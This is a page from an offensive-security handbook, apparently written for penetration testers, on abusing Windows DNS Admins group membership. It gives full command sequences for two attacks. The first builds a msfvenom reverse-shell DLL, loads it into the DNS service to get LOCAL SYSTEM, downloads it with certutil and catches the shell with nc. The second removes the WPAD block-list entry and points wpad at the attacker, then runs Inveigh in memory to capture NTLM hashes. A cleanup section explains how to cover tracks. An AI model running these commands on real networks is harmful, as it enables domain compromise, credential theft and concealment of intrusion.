💥Cyb3rBook

DNS ADMINS

7 min read

PRIMARY CATEGORY → WINDOWS PRIVESC   •   SECURITY GROUPS

Theory

This group is primarily intended for DNS management in AD enviroments

A domain user account which belongs to this group can manage DNS zones, DNS records and DNS configuration of the given nameserver, which is usually a DC

Moreover, it is closely tied to the DNS Server role in AD as this group is created during the feature installation

Enumeration

Listing the Groups to which the Current User belongs
whoami /groups
net user <USER>
Members of DNS Admins
net localgroup "DNS Admins"

Code Execution as LOCAL SYSTEM

We must bear in mind that Windows DNS service supports custom plugins and can call functions from them to resolve some name queries

Since this service runs as LOCAL SYSTEM, we could use the dnscmd command line utility to load a malicious plugin DLL by specifying a remote path controlled by the attacker

Therefore, an operator could craft a DLL which executes a reverse shell when the DNS service is restarted

That is, we leverage theServerLevelPluginDLL hive to load an arbitrary DLL, as stated, once the DNS service is restarted, the given DLL will be loaded as LOCAL SYSTEM

That said, we can proceed as follows →

Generating a Malicious DLL

From the attacker ⚔️

MSFVenom
msfvenom --payload windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> --arch x64 --platform windows --format dll --out <MALICIOUS_DLL>.dll
Mimilib.dll

Reference

Mimilib.dll

Making the DLL accesible from the target

See alternatives

Setting up an SMB Server

From the attacker ⚔️

smbserver.py -smb2support -user '<USER>' -password '<PASSWD>' '<SHARE>' '<LOCAL_PATH>'
Modifying the DNS Service Configuration

From the target 🎯

Then, we need to modify the ServerLevelPlugindll key related to the DNS service configuration

To do so, we can either use the dnscmd utility or edit the registry directly

DNSCmd.exe
dnscmd.exe /config /serverlevelplugindll '\\<ATTACKER_IP>\<MALICIOUS_DLL>'
Editing the Windows Registry directly

CMD & PS → Reg Add

reg add 'HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters' /v ServerLevelPluginDll /t REG_SZ /d '\\<ATTACKER_IP>\<MALICIOUS_DLL>' /F

PS → Set-ItemProperty

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' -Name 'ServerLevelPluginDll' -Value '\\<ATTACKER_IP>\<MALICIOUS_DLL>' -Type String -Force
Setting up a TCP Listener

From the attacker ⚔️

rlwrap -CaR nc -nlvp <TCP_PORT>
Restarting the DNS Service

From the target 🎯

In order to load the DLL, it’s required to restart the DNS service. We may be able to restart the DNS service since we are members of the DNS Admins group

Regardless of this, we should check which permissions the current user has over the DNS service object by retrieving the existing ACEs within the DACL of its security descriptor

Retrieving the Current User SID

To do so, first we need to know which SID the current user has

cmd.exe /c wmic useraccount where "name='%USERNAME%'" get sid
Checking Permission on DNS Service

Reference

Once we know the SID of the current user, we can leverage the sc.exe sdshow command to retrieve the securityDescriptor of the given service object

sc.exe sdshow DNS
Restarting the DNS Service

With the appropiate permissions, we can restart the service as follows

sc.exe stop DNS
sc.exe start DNS
Alternatives

If it does not work and we do not receive the reverse shell , simply transfer the DLL to the target and specify the local path of the DLL instead of a remote UNC path

  • Transferring the DLL to the target

From the attacker ⚔️

python -m http.server 80

From the target 🎯

mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPE
certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/<MALICIOUS_DLL>'
  • Modifying the ServerLevelPluginDll key to load the malicious DLL

From the target 🎯

dnscmd.exe /config /serverlevelplugindll 'C:\Windows\Temp\LPE\<MALICIOUS_DLL>'

Then return to Setting up a TCP Listener

Cleaning up

Once we receive a shell as LOCAL SYSTEM and we can carry out any action as the latter, we should perfom certain cleanup actions to cover our tracks and ensure that the DNS service starts correctly i.e. without loading any malicous DLL which can affect the service availability

Retrieving the value of ServerLevelPluginDll

So first, we must validate that the key value was modified correctly

CMD & PS → Reg Query

reg query 'HKLM\System\CurrentControlSet\Services\DNS\Parameterps' /v 'ServerLevelPluginDll'

PS → Get-ItemProperty

(Get-ItemProperty -Path 'HKLM:System\CurrentControlSet\Services\DNS\Parameters').ServerLevelPluginDll
Deleting Registry Key

CMD & PS → Reg Delete

reg delete 'HKLM\System\CurrentControlSet\Services\DNS\Parameters' /v 'ServerLevelPluginDll' /f

PS → Remove-ItemProperty

Remove-ItemProperty -Path 'HKLM:System\CurrentControlSet\Services\DNS\Parameters' -Name 'ServerLevelPluginDll' -Force
Restarting the DNS service again
sc.exe stop DNS
sc.exe start DNS

WPAD Abuse

Workflow

To prevent WPAD Spoofing, Microsoft introduced the Global Query Block List starting with Window Server 2008, which causes the DNS server to respond with a NXDOMAIN indicating that the asked name does not exist, even if it really exists

However, the situation changes when an operator compromises a domain user account which belongs to the DNS Admins built-in group

Since any member of this group has the ability to enable, disable or edit the Global Query Block List, the entry for WPAD can be removed from this list

Immediately afterward, the operator can create a new DNS record in the DNS zone named WPAD.domain.internal pointing to the attacker’s IP Address

Once this is done, any victim that has the Automatically detect Proxy settings option enabled, which is default, will be subject to the following →

  • A certain web client within its system ( e.g. IE ) will try to automatically detect any valid proxy configuration

  • It will send a query name asking for the resolution of WPAD.domain.internal to the Primary DNS Server, which is typically the DC on a domain-joined machine

  • The DC will respond with the attacker IP Address as the adversary has created the WPAD.domain.internal DNS record previously

  • Then it will send an HTTP request to the attacker’s HTTP server requesting a wpad.dat resouce, which is a JS PAC file that contains a proxy configuration

  • The HTTP server responds with a 401 Unauthorized error and a WWW-Authenticate HTTP header asking for some type of authentication to the client

  • Lastly, the victim’s web client sends an authentication to the attacker and the latter leverage it to capture Net-NTLMv2 hashes or relay the authentication to other node

Requirements

That said, in order to be able to carry out this technique, the following requirements must be met

  • Controlled domain user account belonging to the DNS ADMINS group
  • Attacker machine in the same network as the AD environment
Abuse - Windows
Veryfing Group Membership
whoami /groups | findstr /I "DNS"
Disabling or Deleting the WPAD entry from the Global Query Block List
  • Disable

CMD & PS → dnscmd.exe

dnscmd.exe '<DC_FQDN>' /config /enableglobalqueryblocklist 0

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -Enable $false
  • WPAD Entry Deletion

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -Name 'wpad' -Remove
Checking the status of the Global Query Block List

PS → Get-DnsServerGlobalQueryBlocklist

Get-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>'
Creating the WPAD DNS Record in the Domain DNS Zone

CMD & PS → dnscmd.exe

dnscmd.exe '<DC_FQDN>' /recordadd '<DOMAIN>' wpad A '<ATTACKER_IP>'

PS → Add-DnsServerResourceRecordA

Add-DnsServerResourceRecordA -ComputerName '<DC_FQDN>' -ZoneName '<DOMAIN>' -Name 'wpad' -IPv4Address '<ATTACKER_IP>'
Checking the WPAD DNS Record

CMD & PS → nslookup

nslookup wpad.domain.internal <DC_FQDN>

PS → Resolve-DNSName

Resolve-DNSName -Name wpad.domain.internal -Server <DC_FQDN>
Setting up the HTTP Server via a Responder Tool

Inveigh

  • Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'
Import-Module .\Inveigh.ps1
  • Usage
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTP Y -WPAD Y
Intercepting Authentications

Once we receive incoming authentications through HTTP, simply proceed as follows →


Cleanup - Windows
Deleting the WPAD DNS Record

CMD & PS → dnscmd.exe

dnscmd.exe '<DC_FQDN>' /recorddelete '<DOMAIN>' wpad A '<ATTACKER_IP>' /f

PS → Remove-DnsServerResourceRecord

Remove-DnsServerResourceRecord -ComputerName '<DC_FQDN>' -ZoneName '<DOMAIN>' -Name 'wpad' -RRType A -Force
Reactivating the Global Query Block List

CMD & PS → dnscmd.exe

dnscmd.exe '<DC_FQDN>' /config /enableglobalqueryblocklist 1

PS → Set-DnsServerGlobalQueryBlocklist

Set-DnsServerGlobalQueryBlocklist -ComputerName '<DC_FQDN>' -Enable $true

References

ADSecurity: From DNSAdmins to Domain Admin

Graph View

Backlinks